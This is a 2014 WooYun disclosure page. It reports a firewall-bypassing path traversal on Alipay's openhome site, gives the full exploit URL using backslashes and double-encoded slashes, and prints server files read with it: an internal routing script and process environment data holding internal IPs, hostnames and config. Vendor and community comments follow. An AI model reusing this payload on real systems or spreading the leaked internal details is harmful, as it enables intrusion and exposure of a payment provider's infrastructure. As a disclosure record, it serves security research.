当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051761

漏洞标题:支付宝一个修复后被忽略的漏洞再次进行任意文件遍历下载

相关厂商:支付宝

漏洞作者: 想买一辆车

提交时间:2014-02-23 02:22

修复时间:2014-04-09 02:22

公开时间:2014-04-09 02:22

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-23: 细节已通知厂商并且等待厂商处理中
2014-02-25: 厂商已经确认,细节仅向厂商公开
2014-03-07: 细节向核心白帽子及相关领域专家公开
2014-03-17: 细节向普通白帽子公开
2014-03-27: 细节向实习白帽子公开
2014-04-09: 细节向公众公开

简要描述:

看到一个乌云上支付宝的漏洞被忽略了,说漏洞不存在,但是一般乌云的作者提交的都应该是真实的,于是研究了一把看怎么回事

详细说明:

应用程序漏洞没修复,采取了防火墙进行修复,但是只过滤了../

https://openhome.alipay.com/doc/viewApiDoc.htm?name=alipay.micropay.order.freezepayurl.get&version=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\%252Fetc%252Fpasswd%2500&subVersion=1.0&packageCode=MICROPAY


就可以继续插入了

zhifubao.png

漏洞证明:

写了个脚本看了一些,太累了,睡觉

php abc.php '/usr/local/sbin/route.sh'
#!/usr/bin/env bash
# by yuchen.ying@alipay.com
# update at 2012-08-10
function has_iproute2(){
    which ip &>/dev/null
}
function get_default_route(){
    defgw=$( ip route|grep ^default|awk '{print $3}' )
    echo $defgw
}
#app default gw 
function add_default_route(){
    if [[ "x$defgw" != "x" ]]
    then
        return
    fi
    current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
    defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=1;print}' | tr ' ' '.' )
    dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
    ip route add default via $defgw dev $dev
}
#ccdc default gw 
function add_ccdc_default_route(){
    if [[ "x$defgw" != "x" ]]
    then
        return
    fi
    current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
    defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=1;print}' | tr ' ' '.' )
    dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
    ip route add default via $defgw dev $dev
}
has_iproute2
if [[ $? -ne 0 ]]
then
    echo "NO iproute2 available!" >&2
    exit 1
fi
defgw=$( get_default_route )
domain=$( alidomain )
appname=$( hostname | sed 's/-.*//g' )
zmfmachine=$( hostname |awk -F"-" '{print $2}' )
if [[ "x$zmfmachine" = "x61" ]]
then
    exit 0
fi
if [[ "x$domain" != "xzue.alipay.com" ]] && [[ "x$domain" != "xztg.alipay.com" ]] && [[ "x$domain" != "xzth.alipay.com" ]]
then
    exit 0
fi
case $appname in
    accenter|accordercore|accorderexprod|accore|acctrans|acctransquery|acrmng|acm|addp|airbops|airmng|airprod|airquery|aliapi|aliprod|apimg|appstore|articlemng|assets|authcenter|bankgw|barcodeprod|batchpay|batchpayprod|bcgw|bcm|bdcrm|bdcrmtask|biscenter|bops|bopstask|bossimg|bumng|ca|cacrl|cagw|caprod|cardbin|cashier|certify|certifycore|cfmng|channelrouter|charge|charityprod|cif|clive|clivecenter|clivemng|cmscenter|codfund|codposcore|codprod|commission|communityapi|communitymng|communityprod|communityweb|consumecenter|consumequery|consumequeryhis|couponcore|couponweb|couriercore|creditcore|creditprod|cryptprod|csmng|ctu|ctufm|ctutask|dbackprod|diamond|discount|discountcore|download|dwmds|ebppcore|ebppprod|ecmng|enterprise|escrowexprod|excashier|financemng|financeprod|forexcore|forexprod|fundapi|fundcardprod|fundgw|fundmng|fundpay|fundprod|fundselling|godzilla|gotone|help|home|humomeo|ibccore|image|insuranceprod|ivrprod|jade|katong|katongprod|katongprodsign|katongweb|kbmng|kmi|lifeexprod|lifemng|linepay|mali|mapi|mapitool|mashup|mbill|mbillexprod|mcashier|mcenter|mdeduct|memberexprod|memberprod|memberweb|merchant|merchantprod|merchantsettle|merchantweb|mergepayprod|mfdprod|mfrontgw|mibap|minitrans|mipgw|mktbi|mktcust|mktimg|mktmng|mktpub|mlifeprod|mmng|mmonitormng|mmprod|mnotify|mobile|mobilebc|mobilecore|mobilecpprod|mobilecsprod|mobilepmgw|mobilepp|mobileprod|mobiless|mobileumidprod|monitorevent|morderprod|mquery|msgbroker|neo|oakdf|oakmng|oakpkg|openapi|openauth|opsres|ordermng|otp|pay|paycore|paygw|payrouter|paytask|pcardmng|personal|personalprod|personalportal|pointcore|pointer|pointgw|pointmng|pointndcprod|pointprod|posmng|prepaidcore|prepaidprod|process|processmng|prodcore|prodmng|prodswitch|prodtrans|productchannel|promo|promoevent|promomng|promoomeo|promoprod|promoprodtrans|pucprod|punishcenter|rds|rebateprod|recommend|recon|reservemng|revcore|revmng|revtrans|riskmng|salesmng|sany|seccliprod|securitycenter|securitycore|securitydata|securitygw|securityidentify|securityprod|securityprodmng|selfhelpprod|settlecore|settleprod|settlequery|slotscheduler|smsgw|sofaops|span|staticproxy|statusbar|storagemng|support|swquery|syslog|tbapi|ticketcore|ticketgw|ticketweb|timeout|trade|tradecmtweb|tradeexprod|tradefront|tradequery|tradequeryhis|tradequeryprod|tvprod|umidprod|ustrans|viceroy|virtualprod|wap|wapcashier|xts|ylgw|yzt|zconsole|zrouter|mobileua|secclientgw|combmng|homeproxy|mobilespcore|dnspre|unifygw|sigw|maliprod|crawler|crawlerdpc|bizprodmng|zanalysis|tracker|mobilepos|payadmin|payadmintask|pay-admin|ebppgw|chat|live|toolprod|supergwabc|supergw|supergwcmb|supergwccb|supergwicbc|supergwsmall|fininflux|consumeprod|sftptask|mobilecmng|openexprod|monitorcenter|ntp|webhost|netadmin|survey|workflow|sysinstall|filebridge|gpmng|build|mobileacauth|scm|appdb|findecision|sachores|shtermdb|evoucherprod|kabaoprod|mfgw|sysmng|alicloudsftp|dconfig|znetwork|dwrtsys|superapi|supergwext|mobilecellpay|openhome|omeo|promoomeo|maliprod|zscale|lvsmng|mdmng|clientcashier|intranetproxy|gotonemng|mobileapp|admintools|lvsldcmng|opsrms|repo|admintools|dwdata|dwdis|mobilecashier|nagios|ebppweb|puppet|alipassprod|uibeta|mobilesecurity|aggrbillinfo|maliprod|supergwfront|mobilecashier|clientcashier|mobileacauth|zacm|tmdsvr|abossmonitor|zauth|zsecurity|zappinfo|publichome|dapanweb|tradecloud|opssla|dapanweb|ucrmng|mobilecodec|cscenter|ucrmng|adc|crawlerdpcwallet|crawlerwallet|securitydataproc|publiccore|promoadprod|csaccurate|mdataprod|mobilediscovery|mobiledownload|dwdssp)
        add_default_route;
        ;;
   mdatasync|zacm|mobilebill|monitorweb|monitorstbweb|pcreditprod|anatops)
	# ????̫????, ??д????? -- ruohan.chen
	add_default_route;
	;;
   ccdcapi|counter|ibcgw|countcore|posgw|bizrecon|ccrprod|pointgwsec|supergwpci|posproxy|bipgw|mobilesp|chcrp|wkprod|chcmbpos|pcimnotify)
        add_ccdc_default_route;
        ;;
esac
if [[ "x$appname" == "xkatong" ]]
then
        current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
    defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=5;print}' | tr ' ' '.' )
    dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
    for ip in 20.3.101.99 130.100.9.182
    do
        ip route get $ip &>/dev/null
        if [[ $? -ne 0 ]]
        then
            ip route add $ip via $defgw dev $dev
        fi
    done
fi


php abc.php '/proc/self/environ'
HOSTNAME=openhome-70-1SHELL=/bin/bashHISTSIZE=1000SSH_CLIENT=10.215.91.142 60719 22NLS_LANG=AMERICAN_AMERICA.ZHS16GBKJBOSS_HOME=/opt/taobao/jbossANT_HOME=/opt/taobao/antSVN_EDITOR=viUSER=adminJAVA_OPTS=-server -Xms1800m -Xmx1800m -Xmn680m -Xss256k -XX:PermSize=340m -XX:MaxPermSize=340m -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:CMSFullGCsBeforeCompaction=5 -XX:+UseCMSCompactAtFullCollection -XX:+CMSClassUnloadingEnabled -XX:+DisableExplicitGC -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -Dcom.sun.management.jmxremote.port=9981 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Dprogram.name=run.shLS_COLORS=LD_LIBRARY_PATH=/opt/taobao/install/jdk1.6.0_33/jre/lib/i386/server:/opt/taobao/install/jdk1.6.0_33/jre/lib/i386:/opt/taobao/install/jdk1.6.0_33/jre/../lib/i386:/home/admin/openhome-run/libexec:/opt/taobao/oracle:/opt/taobao/oracle/lib:KDEDIR=/usrPIP_CONFIG_FILE=/etc/pip.confMAIL=/var/spool/mail/adminPATH=/home/utils/grep+:/opt/taobao/java/bin:/opt/taobao/antx/bin:/opt/taobao/ant/bin:/opt/taobao/mysql/bin:/opt/taobao/install/R/bin:/opt/taobao/install/gnupg/bin:/usr/kerberos/bin:/sbin:/bin:/usr/local/sbin:/usr/sbin:/usr/local/bin:/usr/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/binTNS_ADMIN=/home/admin/openhome-run/oracle/network/admin/tnsnames.oraANTX_HOME=/opt/taobao/antxINPUTRC=/etc/inputrcPWD=/home/admin/openhome-run/binJAVA_HOME=/opt/taobao/javaLANG=zh_CN.GB18030SHLVL=5HOME=/home/adminGNUPG_HOME=/opt/taobao/install/gnupgLOGNAME=adminSSH_CONNECTION=10.215.91.142 60719 10.225.4.26 22LESSOPEN=|/usr/bin/lesspipe.sh %sMYSQL_HOME=/opt/taobao/mysqlORACLE_HOME=/home/admin/openhome-run/oracleCLOUDENGINE_HOME=/opt/taobao/cloudengineHISTTIMEFORMAT=[%Y-%m-%d %H:%M:%S] G_BROKEN_FILENAMES=1_=/opt/taobao/java/bin/java


不多看了

修复方案:

版权声明:转载请注明来源 想买一辆车@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-02-25 08:35

厂商回复:

感谢您对支付宝安全的关注。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-02-23 02:24 | Kavia ( 实习白帽子 | Rank:50 漏洞数:10 )

    终于可以火钳留名坐沙发了

  2. 2014-02-23 02:26 | ylaxfcy ( 普通白帽子 | Rank:178 漏洞数:28 | 技术无黑白,但是人有)

    支付宝这次被打脸了,打得好肿,哈哈

  3. 2014-02-23 02:43 | 大天尊 ( 路人 | Rank:20 漏洞数:6 | ´-ω-`)

    @ylaxfcy 不想给5万

  4. 2014-02-23 02:44 | ylaxfcy ( 普通白帽子 | Rank:178 漏洞数:28 | 技术无黑白,但是人有)

    @大天尊 阿里上一次的危机公关被这一次给毁求,对于忽略漏洞的相关人员,估计好日子要到头了

  5. 2014-02-23 02:59 | xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)

    mark

  6. 2014-02-23 08:53 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    看来有好戏了!

  7. 2014-02-23 08:56 | Anymous ( 普通白帽子 | Rank:124 漏洞数:28 )

    阿里真丢脸

  8. 2014-02-23 09:00 | Anymous ( 普通白帽子 | Rank:124 漏洞数:28 )

    @阿里巴巴 WooYun: 支付宝后台服务器任意文件读取漏洞 又被打脸了吧

  9. 2014-02-23 09:44 | 川川 ( 实习白帽子 | Rank:68 漏洞数:28 | 今天我刷屏)

    目测洞主马甲

  10. 2014-02-23 09:54 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    打脸打得啪啪响

  11. 2014-02-23 09:56 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    耳光响亮!

  12. 2014-02-23 09:58 | xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)

    @小胖子 这个发洞是谁的马甲

  13. 2014-02-23 10:20 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    如来神掌!

  14. 2014-02-23 10:28 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    干的漂亮!

  15. 2014-02-23 11:01 | 路人N ( 路人 | Rank:12 漏洞数:8 )

    啪!啪!啪!

  16. 2014-02-23 11:10 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    如来神掌!

  17. 2014-02-23 11:18 | June ( 实习白帽子 | Rank:36 漏洞数:1 | 姐姐妳小时候给猪亲过啊?)

    想买几辆车!?

  18. 2014-02-23 11:26 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    啪!啪!啪!

  19. 2014-02-23 11:29 | 轨迹 ( 路人 | Rank:5 漏洞数:3 | 321)

    这次再没有5万,你还提交么?

  20. 2014-02-23 11:49 | 支付宝(乌云厂商)

    我是跟这个漏洞有关的工程师,之前的漏洞之所以忽略是因为那个漏洞之前已经有人提交给我们,而且要上线修复了,所以不能给前面的同学漏洞分数,后面这个被绕过确实是我们修复方案考虑不周全,所以请各位不要再以讹传讹。谢谢理解和关心。

  21. 2014-02-23 11:59 | Vigoss_Z ( 普通白帽子 | Rank:404 漏洞数:63 | 楞娃)

    @支付宝 上个洞直接说原因,你这。。。

  22. 2014-02-23 12:01 | xcfres54 ( 路人 | Rank:16 漏洞数:3 )

    关注5万

  23. 2014-02-23 12:07 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    这回车你有了

  24. 2014-02-23 12:14 | 支付宝(乌云厂商)

    @Vigoss_Z 之前的漏洞是提交给我们内部的漏洞平台,而且确实比前一个同学更早时间提交,对我们来说已经是一个已知的问题,所以只能选择忽略掉。我们会认真对待每个提交的漏洞,确实是我们的未知安全问题,一定会跟踪修复,给漏洞提交者一个满意答案

  25. 2014-02-23 12:16 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    经过验证,无此漏洞,感谢您对支付宝安全的关注

  26. 2014-02-23 12:18 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    @lucky 哈哈,你又顽皮了..

  27. 2014-02-23 12:41 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @支付宝 写着大大的无此漏洞就直接忽略了,这就叫做内部有人报了啊?自己先看看自己怎么回复的,然后再看外界怎么说。

  28. 2014-02-23 12:53 | ylaxfcy ( 普通白帽子 | Rank:178 漏洞数:28 | 技术无黑白,但是人有)

    无此漏洞,感谢您对支付宝安全的关注 | 现在真解释不清楚了

  29. 2014-02-23 12:58 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    诸多借口 承认一下错误不得了……

  30. 2014-02-23 13:21 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @支付宝 好不要脸 有点节操好吗

  31. 2014-02-23 13:35 | 支付宝(乌云厂商)

    感谢大家的关注,拿到之前漏洞信息时确实已经上线修复了,只是我的个人回复措辞不当,如果给漏洞提交者带来心理伤害,可以私信我,请他吃饭,后面不再一一回复了。

  32. 2014-02-23 13:38 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @支付宝 明明上个漏洞说"无此漏洞",这次变成了有人内部提交,你咋前后做人区别这么大啊

  33. 2014-02-23 13:41 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @支付宝 为什么厂商有时间来和大家解释没时间确认漏洞呢,那么多待确认啊。没法复现么?有一个有视频啊,可以看看怎么做的哦

  34. 2014-02-23 14:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    上次那个洞主是富二代,估计他不会去和支付宝吃饭的……

  35. 2014-02-23 14:46 | tnt1200 ( 普通白帽子 | Rank:121 漏洞数:17 | 关注飞机安全....)

    关注一下

  36. 2014-02-23 16:15 | IT P民 ( 普通白帽子 | Rank:128 漏洞数:24 | 嗯,没什么好介绍的.)

    板凳,广告位招租!

  37. 2014-02-23 17:06 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    有点节操行不行,尼马,我又来晚了

  38. 2014-02-23 17:14 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    洞主的名字取得很实在。

  39. 2014-02-23 21:37 | Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)

    洞主名字估计就是奔支付宝来的。。。

  40. 2014-02-23 22:38 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @支付宝 呵呵 这么说来乌云上所有支付宝的漏洞都会有人提过

  41. 2014-02-24 05:20 | rootnmxx ( 路人 | Rank:5 漏洞数:1 )

    无良厂商啊.节操呢?继续忽略内裤就出来了

  42. 2014-02-24 09:52 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    对于24小时不确认洞洞的厂商直接公开。不然他不懂得重视。。总认为自己高高在上。厂商欠打

  43. 2014-02-24 11:36 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    支付宝最近为什么这么悲剧!!!!

  44. 2014-02-24 16:15 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    提交的信息不够 支付宝 没找到吧可怜我的鱼额宝 在楼主的双目注视之下呀

  45. 2014-02-26 09:56 | 小乐天 ( 实习白帽子 | Rank:64 漏洞数:14 | From KnownSec)

    求揭开谜底吧

  46. 2014-03-17 13:17 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    哈哈

  47. 2014-04-10 09:43 | secgov ( 路人 | Rank:10 漏洞数:3 | 安全审计,漏洞挖掘,WAF. 揭露漏洞有风险,...)

    马云该送你一辆玩具汽车了

  48. 2014-12-11 07:17 | Power ( 实习白帽子 | Rank:54 漏洞数:22 | 还需要等待.........)

    @支付宝 有自己的src就是好啊...哈哈